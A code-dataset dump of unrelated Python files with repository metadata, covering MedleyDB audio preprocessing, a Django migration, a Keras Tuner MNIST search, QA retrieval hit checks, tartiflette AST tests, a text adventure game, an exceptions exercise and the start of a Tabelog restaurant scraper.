frame = f.readframes(1)
x = struct.unpack('=h', frame[:2])[0]
y = struct.unpack('=h', frame[2:])[0]
res.append([x, y])
return np.array(res)
def read_mixed_from_files(dpath, dlist, pickle_file=None):
"""Read the mixed track files and return as dictionary
Args:
dpath (str): path to the directory "MedleyDB/Audio"
dlist (list): list of str, each for one mixed track file
Returns:
dict: in the format of {song_name(string): song_data(numpy array)}
song_data two rows n cols. Each row is a channel, each col is a
time frame.
"""
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_MIX.wav'.format(i))
try:
data = wavfile.read(fpath)[1].T
except:
print "Warning: can't read {}, switch to backup reader". \
format(fpath)
data = backup_wavfile_reader(fpath).T
res[i] = np.float32(data)
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def normalize_data(data):
"""Normalize data with respect to each file in place
For each file, normalize each column using standardization
Args:
data (dict): in format of {song_name(string): song_data(numpy array)}
Returns:
N/A
"""
for k in data.keys():
mean = data[k].mean(axis=1).reshape(2, 1)
std = data[k].std(axis=1).reshape(2, 1)
data[k] = np.float32(((data[k] - mean) / std))
def read_activation_confs(path, pickle_file=None):
"""Read the annotation files of activation confidence, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): annotation(pandas df)}
"""
dpath = os.path.join(path, 'Annotations', 'Instrument_Activations',
'ACTIVATION_CONF')
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i)
annotation = pd.read_csv(fpath, index_col=False)
k = i[:-20].split('(')[0]
k = k.translate(None, "'-")
res[k] = annotation
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def read_meta_data(path, pickle_file=None):
"""Read the metadata for instrument info, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
"""
dpath = os.path.join(path, "Audio")
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_METADATA.yaml'.format(i))
with open(fpath, 'r') as f:
meta = yaml.load(f)
instrument = {k: v['instrument'] for k, v in meta['stems'].items()}
res[i] = instrument
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def groupMetaData(meta, instGroup):
"""Match instrument number in annotation with real instrument name in meta.
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
instGroup (dict): {instrument: instrumentGroup} eg: {'piano': 'struck'}
Returns:
groupedMeta (dict): in the format of
{song_name(string): instrument_map(dict)}
"""
groupedMeta = copy.deepcopy(meta)
for songName in groupedMeta.keys():
for stemName in groupedMeta[songName]:
groupedMeta[songName][stemName] = instGroup[groupedMeta[songName]
[stemName]]
return groupedMeta
def match_meta_annotation(meta, annotation):
"""Match instrument number in annotation with real instrument name in meta.
Note: In the annotation of one mixed track, there can be multiple instances
of the same instrument, in which case the same column name appears
multiple times in the pandas df
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
annotation (dict): {song_name(string): annotation(pandas df)}
Returns:
list: containing all instruments involved, sorted in alphebic order
"""
assert(len(meta) == len(annotation))
all_instruments = set()
for k, v in annotation.items():
v.rename(columns=meta[k], inplace=True)
all_instruments.update(v.columns[1:])
return sorted(list(all_instruments))
def split_music_to_patches(data, annotation, inst_map, label_aggr, length=1,
sr=44100, time_window=100.0, binary=False,
threshold=None):
"""Split each music file into (length) second patches and label each patch
Note: for each music file, the last patch that is not long enough is
abandoned.
And each patch is raveled to have only one row.
Args:
data(dict): the raw input data for each music file
annotation(dict): annotation for each music file
calculated as average confidence in this time period
inst_map(dict): a dictionary that maps a intrument name to its correct
position in the sorted list of all instruments
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
length(int): length of each patch, in seconds
sr (int): sample rate of raw audio
time_window(float): time windows for average (in milliseconds)
Returns:
dict: {'X': np array for X, 'y': np array for y, 'present': np array
of indicators for whether the instrument is present in the
track from which the patch is taken}
"""
res = []
patch_size = sr * length
for k, v in data.items():
for i, e in enumerate(xrange(0, v.shape[1] - patch_size, patch_size)):
patch = v[:, e:patch_size+e].ravel()
sub_df = annotation[k][(i * length <= annotation[k].time) &
(annotation[k].time < (i + 1) * length)]
if label_aggr is not None:
inst_conf = sub_df.apply(label_aggr, 0).drop('time')
else:
inst_conf = patch_label.patch_label(0, length, time_window,
sub_df, binary,
threshold).iloc[0]
label = np.zeros(len(inst_map), dtype='float32')
is_present = np.zeros(len(inst_map), dtype='float32')
for j in inst_conf.index:
temp = inst_conf[j]
# if there are two columns of the same instrument, take maximum
if isinstance(temp, pd.Series):
temp = temp.max()
label[inst_map[j]] = temp
is_present[inst_map[j]] = 1.0
res.append((patch, label, is_present, k, (i*length, (i+1)*length)))
X, y, present, song_name, time = zip(*res)
return {'X': np.array(X), 'y': np.array(y), 'present': np.array(present),
'song_name': song_name, 'time': np.array(time, dtype='float32')}
def prep_data(in_path, out_path=os.curdir, save_size=20, norm_channel=False,
label_aggr=None, start_from=0, groupID='Group 4', **kwargs):
"""Prepare data for preprocessing
Args:
in_path(str): the path for "MedleyDB"
out_path(str): the path to save pkl files, default to be current
save_size(int): the number of wav files contained in each mat
file. Large save_size requires large memory
norm_channel(bool): whehter to normalize each channel locally
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
start_from(int): the order of file in alphebic order to start reading
from. All files before that are ignored. Used to
continue from the file last read.
kwargs (dict): additional arguments to pass to split_music_to_patches
Returns:
N/A
"""
# save parameters for this run
to_write = ['{} = {}'.format(k, v) for k, v in locals().items()]
with open(os.path.join(out_path, 'config.txt'), 'wb') as f:
f.write('\n'.join(to_write))
# read annotations and match with metadata
anno_pkl = os.path.join(out_path, 'anno_label.pkl')
annotation = read_activation_confs(in_path)
meta = read_meta_data(in_path)
# group instruments in metadata
instGrouping = pd.read_csv('./instGroup.csv')
groupLookup = dict(zip(instGrouping['Instrument'].values,
instGrouping[groupID].values))
meta = groupMetaData(meta, groupLookup)
all_instruments = match_meta_annotation(meta, annotation)
if not os.path.exists(anno_pkl):
with open(anno_pkl, 'w') as f:
cPickle.dump(annotation, f)
# create and save song_instr mapping
song_instr = {}
for k, v in annotation.items():
song_instr[k] = set(v.columns[1:])
with open(os.path.join(out_path, 'song_instr.pkl'), 'wb') as f:
cPickle.dump(song_instr, f)
# save all instrument list to file
with open('all_instruments.txt', 'wb') as f:
f.write('\n'.join(all_instruments))
# get a dictionary mapping all instrument to sorted order
all_instruments_map = {e: i for i, e in enumerate(all_instruments)}
print 'Total number of labels = {}'.format(len(all_instruments))
# read mixed tracks
dpath = os.path.join(in_path, "Audio")
dlist = sorted(os.listdir(dpath)) # get list of tracks in sorted order
# write the list to file as reference for song_names in data
with open(os.path.join(out_path, 'song_name_list.txt'), 'wb') as f:
f.write('\n'.join(dlist))
# get a mapping of song names to their sorted order
song_name_map = {e: i for i, e in enumerate(dlist)}
for i in range(max(start_from, 0), len(dlist), save_size):
tdlist = dlist[i:i+save_size]
data = read_mixed_from_files(dpath, tdlist)
print 'finished reading file'
if norm_channel:
normalize_data(data)
print 'finished normalizing data'
# split to x second patches
for k, v in data.items():
patched_data = split_music_to_patches({k: v}, annotation,
all_instruments_map,
label_aggr, **kwargs)
temp_l = len(patched_data['song_name'])
patched_data['song_name'] = np.array([song_name_map[e] for e in
patched_data['song_name']],
dtype='float32'). \
reshape(temp_l, 1)
# save patches to file
patches_save_path = os.path.join(out_path, '{}_patched.mat'.
format(k))
if not os.path.exists(patches_save_path):
savemat(patches_save_path, patched_data)
del patched_data
print 'finished taking patches of {}'.format(k)
del data
gc.collect()
print 'finished {} of {}'.format(min(i+save_size, len(dlist)),
len(dlist))
def main():
root = os.path.abspath(os.sep)
in_path = os.path.join(root, 'Volumes', 'VOL2', 'MedleyDB')
prep_data(in_path, length=1, time_window=100.0, binary=False,
threshold=None)
| [
"[email protected]"
]
| |
da39ff189fd2c0d2ba922949117085f9ce98e2fa | 85be450530138c8b66c513c4283bcb1d58caeeb0 | /apps/funcionarios/migrations/0005_funcionario_imagem.py | bc149c39e59bf25051a7e604642ca132a0e9a4c1 | []
| no_license | fgomesc/gestao_teste | 6be81a263fddb1b1e5d6a2d768387fc024e9bdc3 | b2890ffa99361dd30b002706c94d1e5299651315 | refs/heads/master | 2021-09-25T06:21:51.602878 | 2021-09-14T18:27:13 | 2021-09-14T18:27:13 | 236,030,673 | 0 | 0 | null | 2021-06-10T22:31:09 | 2020-01-24T15:42:59 | JavaScript | UTF-8 | Python | false | false | 446 | py | # Generated by Django 2.1.1 on 2018-11-17 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funcionarios', '0004_auto_20181029_2313'),
]
operations = [
migrations.AddField(
model_name='funcionario',
name='imagem',
field=models.ImageField(default=1, upload_to='fotos'),
preserve_default=False,
),
]
| [
"[email protected]"
]
| |
5438bf2918f6cb484ba4bfdaf5ceabf6e3a64e9b | e39f5ed824db24444580fabb42a06d8029d403ed | /machine_learning/class_03/lesson_01/mnist-search.py | 9be1204f3b77d45af7a43855106b3dad5f89bc30 | []
| no_license | tepkool01/uw_school | 4a027f10b1b7cd28ad2a64a224bdd0fbaa9c040c | 69490b53c0a1a1c7f4b318a988fe1b1e328e3163 | refs/heads/master | 2023-07-15T04:57:52.688896 | 2021-08-23T21:41:27 | 2021-08-23T21:41:27 | 303,208,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | # pip install keras-tuner
import math
import numpy as np
from io import TextIOWrapper
from PIL import Image
from zipfile import ZipFile
trnX = np.zeros((60000, 28, 28), dtype = "float32")
trnY = np.zeros((60000), dtype = "int32")
tstX = np.zeros((10000, 28, 28), dtype = "float32")
with ZipFile("ml530-2021-sp-mnist.zip", "r") as archive:
index = 0
for i in range(trnX.shape[0]):
with archive.open("mnist_trn_images/mnist_trn_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
trnX[i] = np.asarray(img)
index = index + 1
with TextIOWrapper(archive.open("mnist_trn.csv", "r")) as file:
header = file.readline()
for i in range(trnY.shape[0]):
trnY[i] = np.int32(file.readline().strip("\r\n").split(",")[1])
index = 0
for i in range(tstX.shape[0]):
with archive.open("mnist_tst_images/mnist_tst_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
tstX[i] = np.asarray(img)
index = index + 1
trnX = trnX.reshape(trnX.shape[0], trnX.shape[1] * trnX.shape[2])
tstX = tstX.reshape(tstX.shape[0], tstX.shape[1] * tstX.shape[2])
trnX = trnX / 255
tstX = tstX / 255
from tensorflow import keras
from tensorflow.keras import callbacks, layers, optimizers
from kerastuner.tuners import RandomSearch, Hyperband, BayesianOptimization
class CustomTuner(Hyperband):
def run_trial(self, trial, *args, **kwargs):
batch_size = trial.hyperparameters.values["batch_size"]
kwargs["batch_size"] = batch_size
kwargs["steps_per_epoch"] = math.ceil(0.9 * trnX.shape[0] / batch_size)
super(CustomTuner, self).run_trial(trial, *args, **kwargs)
def build_model(hp):
depth = hp.Int("depth", min_value = 0, max_value = 4, step = 1)
width = hp.Choice("width", values = [ 64, 128, 256, 512 ])
activation = hp.Choice("activation", values = [ "linear", "relu", "sigmoid", "tanh" ])
dropout = hp.Float("dropout", 0, 0.5, step = 0.1)
optimizer = hp.Choice("optimizer", values = [ "adam", "rmsprop", "sgd" ])
learning_rate = hp.Choice("learning_rate", values = [ 0.01, 0.001, 0.0001 ])
batch_size = hp.Choice("batch_size", values = [ 512, 1024, 2048 ])
model = keras.Sequential()
for depth in range(depth):
model.add(layers.Dense(units = width, activation = activation))
model.add(layers.Dropout(dropout))
    # map the sampled optimizer name to the matching Keras optimizer class
    optimizer_cls = optimizers.Adam
    if optimizer == "rmsprop":
        optimizer_cls = optimizers.RMSprop
    elif optimizer == "sgd":
        optimizer_cls = optimizers.SGD
    model.add(layers.Dense(trnY.max() + 1, activation = "softmax"))
    model.compile(optimizer = optimizer_cls(learning_rate = learning_rate), loss = "sparse_categorical_crossentropy", metrics = [ "accuracy" ])
return model
#tuner = RandomSearch(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# executions_per_trial = 1,
# directory = "tuning",
# project_name = "random")
#tuner = BayesianOptimization(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# num_initial_points = 8,
# directory = "tuning",
# project_name = "bayesian")
#tuner = Hyperband(build_model,
# objective = "val_accuracy",
# max_epochs = 32,
# hyperband_iterations = 1,
# directory = "tuning",
# project_name = "bandit")
tuner = CustomTuner(build_model,
objective = "val_accuracy",
max_epochs = 32,
hyperband_iterations = 1,
directory = "tuning",
project_name = "bandit")
callbacks = [ callbacks.ReduceLROnPlateau(monitor = "val_accuracy", patience = 2),
callbacks.EarlyStopping(monitor = "val_accuracy", patience = 8, restore_best_weights = True) ]
tuner.search_space_summary()
tuner.search(trnX, trnY, validation_split = 0.1, callbacks = callbacks)
tuner.results_summary()
model = tuner.get_best_models(num_models = 1)[0]
hyperparameters = tuner.get_best_hyperparameters(num_trials = 1)[0].get_config()
print(hyperparameters["values"])
probabilities = model.predict(tstX)
classes = probabilities.argmax(axis = -1)
predictions = open("predictions.csv", "w")
predictions.write("id,label\n")
for i in range(tstX.shape[0]):
predictions.write(str(i).zfill(5) + "," + str(classes[i]) + "\n")
predictions.close()
model.summary()
| [
"[email protected]"
]
| |
c705c0b17acc935c371cb01c2c106b884fe5ba24 | fdbcef18ee57e350619cba7a0aa430f2bc832dcb | /scalingqa/retriever/hit_processing.py | 8611e4252ec2a8e158ff56bb0bcca96c1b8be205 | [
"MIT"
]
| permissive | Ankur3107/scalingQA | 5091f14bf14f53fbe198287e34d8c0376e40cdc8 | f648e34a9e4d7d4dbc2549a3c8767b6a25e3c447 | refs/heads/main | 2023-04-17T20:03:40.661471 | 2021-04-22T05:28:30 | 2021-04-22T05:28:30 | 360,213,015 | 0 | 0 | MIT | 2021-04-22T05:28:31 | 2021-04-21T15:08:34 | Python | UTF-8 | Python | false | false | 2,149 | py | import re
from ..common.drqa_tokenizers.simple_tokenizer import SimpleTokenizer
from ..common.utility.metrics import normalize
dpr_tokenizer = None
def process_hit_token_dpr(e, db, match_type="string"):
global dpr_tokenizer
if dpr_tokenizer is None:
dpr_tokenizer = SimpleTokenizer()
def regex_match(text, pattern):
"""Test if a regex pattern is contained within a text."""
try:
pattern = re.compile(
pattern,
flags=re.IGNORECASE + re.UNICODE + re.MULTILINE,
)
except BaseException:
return False
return pattern.search(text) is not None
def has_answer(answers, text, tokenizer, match_type) -> bool:
"""Check if a document contains an answer string.
If `match_type` is string, token matching is done between the text and answer.
If `match_type` is regex, we search the whole text with the regex.
"""
text = normalize(text)
if match_type == 'string':
# Answer is a list of possible strings
text = tokenizer.tokenize(text).words(uncased=True)
for single_answer in answers:
single_answer = normalize(single_answer)
single_answer = tokenizer.tokenize(single_answer)
single_answer = single_answer.words(uncased=True)
for i in range(0, len(text) - len(single_answer) + 1):
if single_answer == text[i: i + len(single_answer)]:
return True
elif match_type == 'regex':
# Answer is a regex
for single_answer in answers:
single_answer = normalize(single_answer)
if regex_match(text, single_answer):
return True
return False
top, answers, raw_question = e
if type(top) != list:
top = top.tolist()
for rank, t in enumerate(top):
text = db.get_doc_text(t)[0]
if has_answer(answers, text, dpr_tokenizer, match_type):
return {"hit": True, "hit_rank": rank}
return {"hit": False, "hit_rank": -1}
| [
"[email protected]"
]
| |
12431f449479c4225d285315b7a3bb921570c910 | efcd21234f3291e8fc561f49a7c88fc57a63e952 | /tests/unit/language/ast/test_directive_definition.py | b356575d34de9eab8e68c11d4445ef82a42fc23c | [
"MIT"
]
| permissive | tartiflette/tartiflette | 146214a43847d2f423bf74594643c1fdefc746f1 | 421c1e937f553d6a5bf2f30154022c0d77053cfb | refs/heads/master | 2023-09-01T02:40:05.974025 | 2022-01-20T14:55:31 | 2022-01-20T14:55:31 | 119,035,565 | 586 | 39 | MIT | 2023-09-11T07:49:27 | 2018-01-26T09:56:10 | Python | UTF-8 | Python | false | false | 6,673 | py | import pytest
from tartiflette.language.ast import DirectiveDefinitionNode
def test_directivedefinitionnode__init__():
directive_definition_node = DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
)
assert directive_definition_node.name == "directiveDefinitionName"
assert (
directive_definition_node.locations == "directiveDefinitionLocations"
)
assert (
directive_definition_node.description
== "directiveDefinitionDescription"
)
assert (
directive_definition_node.arguments == "directiveDefinitionArguments"
)
assert directive_definition_node.location == "directiveDefinitionLocation"
@pytest.mark.parametrize(
"directive_definition_node,other,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
Ellipsis,
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionNameBis",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocationsBis",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescriptionBis",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArgumentsBis",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocationBis",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
True,
),
],
)
def test_directivedefinitionnode__eq__(
directive_definition_node, other, expected
):
assert (directive_definition_node == other) is expected
@pytest.mark.parametrize(
"directive_definition_node,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
"DirectiveDefinitionNode("
"description='directiveDefinitionDescription', "
"name='directiveDefinitionName', "
"arguments='directiveDefinitionArguments', "
"locations='directiveDefinitionLocations', "
"location='directiveDefinitionLocation')",
)
],
)
def test_directivedefinitionnode__repr__(directive_definition_node, expected):
assert directive_definition_node.__repr__() == expected
| [
"[email protected]"
]
| |
353d23ee1d8f260fdba75771dad1edcc93f3b402 | f09f92fb6d46d75ce92d3e1183adc68b8087a56e | /sandbox.py | b4af84ff90854b543f72b9ef82e6a7468f1b214b | []
| no_license | nikitafainberg/darkWorldAuth | d7f79ebb04ec0279c3b4b69a25e746d445a4ed19 | 24547eda0622fe15a1b3cfed674f2660623c2a0d | refs/heads/master | 2023-08-29T11:04:35.954817 | 2021-11-13T23:26:04 | 2021-11-13T23:26:04 | 427,531,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from DB_manger import dbConnector
if __name__ == '__main__':
db_connector = dbConnector()
users = db_connector.get_user_by_username("nick")[0]
print(users)
| [
"[email protected]"
]
| |
eea33ae817b3fd5ed3cb9850e88cdc7f95ce66d3 | 2676b16638e5495fd85aa0ab1bb34a4869373015 | /exceptions.py | 0494599441bd3a56abae9eab930a1c58bf29a917 | []
| no_license | ryrysmiley/compsci230 | c9053f24fa3bec8ce84f92682b6a882c8e67c9fd | 0d4ece995d5c1b654dd230ada6a480198f4b926a | refs/heads/main | 2023-01-24T14:07:13.209862 | 2020-12-08T01:48:48 | 2020-12-08T01:48:48 | 315,526,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | """
try:
f=open("test.txt")
print(f.read())
except FileNotFoundError:
print("File doesn't exist")
try:
x=int(input())
print(2/x)
except ValueError:
print("that is not an int")
except ZeroDivisionError:
print("can't divide by zero")
"""
user_input = ''
while user_input != "q":
try:
user_age=int(input("age"))
if user_age<=0:
raise ValueError("Invalid age")
print(user_age)
weight=int(input("weight"))
if weight<=0:
raise ValueError("Invalid weight")
print(weight)
height=int(input("height"))
if height<=0:
raise ValueError("Invalid height")
print(height)
except ValueError as e:
print(e)
user_input = input("q to quit")
| [
"[email protected]"
]
| |
045e3b79ee98a308915d4259f3453d80f710f82a | 2fdc236b11ad16052ceab7f566657fca41f1f45e | /ex43.py | 6a274bbbb087040ef06becf94b2fcb75158b37d6 | []
| no_license | HeshamBahgat/Learn-Python-The-Hard-Way | 6bc155e18efaf24cdf90a591149b8e97b3926337 | 67a6d1320eb9964f6db0cf435b1f319cb14c7a3b | refs/heads/master | 2020-06-03T01:05:11.992987 | 2019-06-11T13:27:34 | 2019-06-11T13:27:34 | 191,370,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,711 | py | from sys import exit
from random import randint
from textwrap import dedent
## adventure game
class Scene(object):
def enter(self):
print("This scene is not yet configured")
print("Subclass it and implement enter().")
exit(1)
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene("finished")
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
    quips = [
        "You died. You kinda suck at this.",
        "Your Mom would be proud...if she were smarter.",
        "Such a luser.",
        "I have a small puppy that's better at this.",
        "You're worse than your Dad's jokes."]
def enter(self):
print(Death.quips[randint(0, len(self.quips)-1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print(dedent('''
            The Gothons of planet Percal #25 have invaded your ship and destroyed your entire crew.
            You are the last surviving member and your last mission is to get the neutron destruct bomb from the weapons Armory,
            put it in the bridge, and blow the ship up after getting into an escape pod.
            You're running down the central corridor to the weapons Armory when a Gothon jumps out:
            red scaly skin, dark grimy teeth, and an evil clown costume flowing around his hate-filled body. He's blocking the door to the Armory
            and about to pull a weapon to blast you.'''))
action = input("> ")
if action == "shoot!":
print(dedent("""
Quick on the draw you yank out your blaster and fire
it at the Gothon. His clown costume is flowing and
moving around his body, which throws off your aim.
Your laser hits his costume but misses him entirely.
This completely ruins his brand new costume his mother
bought him, which makes him fly into an insane rage
and blast you repeatedly in the face until you are
dead. Then he eats you.
"""))
            return 'death'
elif action == "tell a joke":
print(dedent("""
Lucky for you they made you learn Gothon insults in
the academy. You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr,
fur fvgf nebhaq gur ubhfr. The Gothon stops, tries
not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in
the head putting him down, then jump through the
Weapon Armory door.
"""))
return 'laser_weapon_armory'
else:
print("Does NOT Compute!")
return "central_corridor"
class LaserWeaponArmory(Scene):
def enter(self):
print(dedent("""
You do a dive roll into the Weapon Armory, crouch and scan
the room for more Gothons that might be hiding. It's dead
quiet, too quiet. You stand up and run to the far side of
the room and find the neutron bomb in its container.
There's a keypad lock on the box and you need the code to
get the bomb out. If you get the code wrong 10 times then
the lock closes forever and you can't get the bomb. The
code is 3 digits.
"""))
code = f"{randint(1,9)}{randint(1,9)}{randint(1,9)}"
print (code)
guess = input("[keypad> ]")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD")
guesses += 1
guess = input("[keypad> ]")
if guess == code:
print(dedent("""
The container clicks open and the seal breaks, letting
gas out. You grab the neutron bomb and run as fast as
you can to the bridge where you must place it in the
right spot.
"""))
return 'the_bridge'
else:
print(dedent("""
The lock buzzes one last time and then you hear a
sickening melting sound as the mechanism is fused
together. You decide to sit there, and finally the
Gothons blow up the ship from their ship and you die.
"""))
return 'death'
class TheBridge(Scene):
def enter(self):
print(dedent("""
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
"""))
action = input("> ")
if action == "throw the bomb":
print(dedent("""
In a panic you throw the bomb at the group of Gothons
and make a leap for the door. Right as you drop it a
Gothon shoots you right in the back killing you. As
you die you see another Gothon frantically try to
disarm the bomb. You die knowing they will probably
blow up when it goes off.
"""))
return 'death'
elif action == "slowly place the bomb":
print(dedent("""
You point your blaster at the bomb under your arm and
the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then
carefully place the bomb on the floor, pointing your
blaster at it. You then jump back through the door,
punch the close button and blast the lock so the
Gothons can't get out. Now that the bomb is placed
you run to the escape pod to get off this tin can.
"""))
return 'escape_pod'
else:
print("DOES NOT COMPUTE!")
return "the_bridge"
class EscapePod(Scene):
def enter(self):
        print(dedent("""
            You rush through the ship desperately trying to make it to
            the escape pod before the whole ship explodes. It seems
            like hardly any Gothons are on the ship, so your run is
            clear of interference. You get to the chamber with the
            escape pods, and now need to pick one to take. Some of
            them could be damaged but you don't have time to look.
            There's 5 pods, which one do you take?
            """))
good_pod = randint(1, 5)
print(good_pod)
guess = input("[pod #]> ")
if int(guess) != good_pod:
            print(dedent(f"""
You jump into pod {guess} and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body into
jam jelly.
"""))
return 'death'
else:
            print(dedent(f"""
You jump into pod {guess} and hit the eject button.
The pod easily slides out into space heading to the
planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
"""))
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job")
return "Finished"
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished(),
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
va1 = Map.scenes.get(scene_name)
return va1
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
"""
1- the Map class stores every scene in a dict; each scene has a key used to look it up and run it
2- the Engine drives the Map: it creates two variables (the current and last scenes) and calls each scene depending on them
3- these variables use the Map's methods and the scenes dict
""" | [
"[email protected]"
]
| |
47cc53e4d489c658835626b31746754eba3a8c9b | 361270624816c78772e39efd5dc3269da19fd156 | /test.py | a14298a618e48218120391c19beb2ce733c295d8 | []
| no_license | Dairaku/Scraping | 4f14c741b8a16ca33393fcf146b34e7896b38ab4 | ab39f3542c1fc61148249faac31b5bcc59f76639 | refs/heads/master | 2020-05-27T14:29:10.364824 | 2019-05-26T08:51:38 | 2019-05-26T08:51:38 | 188,660,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,646 | py | #!/usr/bin/env python
# coding: utf-8
import csv
import requests
from urllib.request import urlopen
from bs4 import BeautifulSoup
import ssl
import re
import pandas as pd
import time
base_url = "https://tabelog.com/tokyo/A1304/A130401/rstLst/"
begin_page = 1
end_page = 10
# for computing the last page
r_base = requests.get(base_url)
soup_base = BeautifulSoup(r_base.content, 'html.parser')
page_num = begin_page
# build the list of CSV rows
csvlist = [["store_name", "score", "review_num", "url", "category_name", "reserve_tel", "prefecture", "district", "seat_num", "facebook", "restaurant_tel", "homepage", "open_date"]]
# open the CSV file; create it if it does not exist
f = open("output.csv", "w", encoding="utf_8_sig")
writecsv = csv.writer(f, lineterminator='\n')
while True:
list_url = base_url + str(page_num) + "/"
print(list_url)
    # fetch the listing pages in pagination order
r1 = requests.get(list_url)
soup1 = BeautifulSoup(r1.content, 'lxml')
soup_a_list = soup1.find_all('a', class_='list-rst__rst-name-target')
    # get the URL of each restaurant's detail page
for soup_a in soup_a_list:
item_url = soup_a.get('href')
print(item_url)
r = requests.get(item_url)
soup = BeautifulSoup(r.content, 'lxml')
        # score
try:
score = soup.find("span", class_="rdheader-rating__score-val-dtl").get_text()
print(score)
except:
score="NULL"
pass
print(score)
        # number of reviews
try:
review_num = soup.find("em", class_="num").get_text()
except:
review_num="NULL"
pass
print(review_num)
        # grab the raw page markup for string parsing
info = str(soup)
        # restaurant name
try:
store_name = info.split('display-name')[1].split('<span>')[1].split('</span>')[0].strip()
except:
store_name="NULL"
pass
print(store_name)
